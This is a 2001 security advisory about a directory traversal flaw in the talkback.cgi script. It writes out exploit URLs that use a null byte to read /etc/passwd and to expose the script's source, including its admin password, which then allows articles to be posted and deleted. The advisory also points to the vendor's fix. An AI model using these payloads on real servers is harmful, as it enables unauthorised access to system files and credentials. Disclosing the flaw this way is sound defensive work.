Talkback.cgi allows remote users to view any file on the webserver. Exploit URL included. It is also possible to display the admin password. Fix available here.
e4e768f74ba3a8097a57dd1359054407e765b0969853046f335247b526a09588
[whizkunde security advisory: talkback (CGI)]
https://www.whizkunde.org | stan@whizkunde.org
----------------------------------------------------------
Release date: April 9th 2001
Subject: talkback.cgi security problem
Systems affected: UNIX systems running talkback CGI script
Vendor: https://www.waytotheweb.com
----------------------------------------------------------
1. problem
Talkback.cgi may allow remote users (website visitors) to
view any file on a webserver (depending on the user the
webserver is running on).
Regard this URL:
https://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1
This will display the /etc/passwd (if the webserver user has
access to this file).
Another URL can display the source of talkback.cgi itself
that contains the admin password:
https://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1
(You might have to use another URL instead of
../cgi-bin/talkback.cgi%00, this depends on where the
cgi-bin is installed)
In this file you can find $admin_password that can be used in:
https://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin
to post & delete articles.
2. fix
Way To The Web has released an updated version of
talkback.cgi that isn't vulnerable to this problem:
https://www.waytotheweb.com/webscripts/talkback.htm
----------------------------------------------------------
Stan a.k.a. ThePike
stan@whizkunde.org
https://www.whizkunde.org
Copyright whizkunde security team 2001